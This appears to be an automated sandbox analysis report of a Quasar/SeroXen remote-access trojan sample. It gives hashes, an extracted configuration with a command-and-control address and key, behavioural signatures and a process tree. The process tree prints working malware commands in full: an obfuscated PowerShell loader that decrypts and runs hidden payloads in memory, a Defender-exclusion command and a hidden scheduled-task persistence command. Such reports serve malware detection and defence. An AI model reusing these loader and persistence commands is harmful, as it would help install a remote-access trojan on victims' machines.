Analysis
-
max time kernel
253s -
max time network
261s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
01-07-2024 16:44
General
-
Target
SeroXen.rar
-
Size
7.4MB
-
MD5
3e5e034189b129f8ffd7b6ae57982740
-
SHA1
a099319659a4852ee87219d15bd04606660a9afa
-
SHA256
43b56573aa46b0a5c526e41ef58f0e902074181622a7b7508fa97c447b8afcc9
-
SHA512
578eec54ab0603ba4689590a181510e9aaf04bb3863f6283f19ff241f343ccd9cfbac8d35b7bcb65ece1d76122e0b808f90918ac468e3b4987717bd821c5b258
-
SSDEEP
196608:zSoEufZDDXsWegc13ygKrA8Uwsqew2k8ASGh/RHrw:zSoZDDXvcwrA8KkLB/hw
Malware Config
Extracted
quasar
15.5.0
SeroXen
147.185.221.20:49485
QSR_MUTEX_rzhQPLl57DqbMvbZp9
-
encryption_key
M2nw0PLpJxuyZQLyQ14p
-
install_name
Client.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Using powershell.exe command.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 8 IoCs
-
Loads dropped DLL 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 4 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 3 IoCs
-
Modifies registry class 64 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 43 IoCs
-
Suspicious use of SendNotifyMessage 27 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding2⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\SeroXen.rar2⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe8753ab58,0x7ffe8753ab68,0x7ffe8753ab783⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1716 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:23⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2928 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2936 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4372 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4376 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4656 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4628 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level3⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff791ffae48,0x7ff791ffae58,0x7ff791ffae684⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5048 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4616 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3264 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4772 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5192 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4760 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5368 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5212 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Users\Admin\Downloads\7z2407-x64.exe"C:\Users\Admin\Downloads\7z2407-x64.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1596 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:23⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\SeroXen\" -spe -an -ai#7zMap19308:94:7zEvent325812⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\SeroXen.exe"C:\Users\Admin\AppData\Local\Temp\SeroXen\SeroXen.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAaQBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAegBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZABuACMAPgA="3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Uni.bat" "3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OYi6jovj9grd+OhQ3Yq9CKyYEolqR3DCnwhMoiMIiic='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x758XCMTdc4jhHfAjXEAbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PTonT=New-Object System.IO.MemoryStream(,$param_var); $pteGk=New-Object System.IO.MemoryStream; $QeYIq=New-Object System.IO.Compression.GZipStream($PTonT, [IO.Compression.CompressionMode]::Decompress); $QeYIq.CopyTo($pteGk); $QeYIq.Dispose(); $PTonT.Dispose(); $pteGk.Dispose(); $pteGk.ToArray();}function execute_function($param_var,$param2_var){ $imxQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oCBDZ=$imxQj.EntryPoint; $oCBDZ.Invoke($null, $param2_var);}$bxwFd = 'C:\Windows\Uni.bat';$host.UI.RawUI.WindowTitle = $bxwFd;$spiDd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bxwFd).Split([Environment]::NewLine);foreach ($urTOm in $spiDd) { if ($urTOm.StartsWith('VUGwKkMvYCOpuHkPGxtm')) { $jdwUC=$urTOm.Substring(20); break; }}$payloads_var=[string[]]$jdwUC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_215_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_215.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_215.vbs"5⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_215.bat" "6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OYi6jovj9grd+OhQ3Yq9CKyYEolqR3DCnwhMoiMIiic='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x758XCMTdc4jhHfAjXEAbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PTonT=New-Object System.IO.MemoryStream(,$param_var); $pteGk=New-Object System.IO.MemoryStream; $QeYIq=New-Object System.IO.Compression.GZipStream($PTonT, [IO.Compression.CompressionMode]::Decompress); $QeYIq.CopyTo($pteGk); $QeYIq.Dispose(); $PTonT.Dispose(); $pteGk.Dispose(); $pteGk.ToArray();}function execute_function($param_var,$param2_var){ $imxQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oCBDZ=$imxQj.EntryPoint; $oCBDZ.Invoke($null, $param2_var);}$bxwFd = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_215.bat';$host.UI.RawUI.WindowTitle = $bxwFd;$spiDd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bxwFd).Split([Environment]::NewLine);foreach ($urTOm in $spiDd) { if ($urTOm.StartsWith('VUGwKkMvYCOpuHkPGxtm')) { $jdwUC=$urTOm.Substring(20); break; }}$payloads_var=[string[]]$jdwUC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\SeroXen.exe"C:\Users\Admin\AppData\Local\Temp\SeroXen.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\SeroXen.exe"C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\SeroXen.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\SeroXen.exe"C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\SeroXen.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\SeroXen.exe"C:\Users\Admin\AppData\Local\Temp\SeroXen\SeroXen.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAaQBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAegBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZABuACMAPgA="3⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Uni.bat" "3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OYi6jovj9grd+OhQ3Yq9CKyYEolqR3DCnwhMoiMIiic='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x758XCMTdc4jhHfAjXEAbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PTonT=New-Object System.IO.MemoryStream(,$param_var); $pteGk=New-Object System.IO.MemoryStream; $QeYIq=New-Object System.IO.Compression.GZipStream($PTonT, [IO.Compression.CompressionMode]::Decompress); $QeYIq.CopyTo($pteGk); $QeYIq.Dispose(); $PTonT.Dispose(); $pteGk.Dispose(); $pteGk.ToArray();}function execute_function($param_var,$param2_var){ $imxQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oCBDZ=$imxQj.EntryPoint; $oCBDZ.Invoke($null, $param2_var);}$bxwFd = 'C:\Windows\Uni.bat';$host.UI.RawUI.WindowTitle = $bxwFd;$spiDd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bxwFd).Split([Environment]::NewLine);foreach ($urTOm in $spiDd) { if ($urTOm.StartsWith('VUGwKkMvYCOpuHkPGxtm')) { $jdwUC=$urTOm.Substring(20); break; }}$payloads_var=[string[]]$jdwUC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_199_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_199.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
-
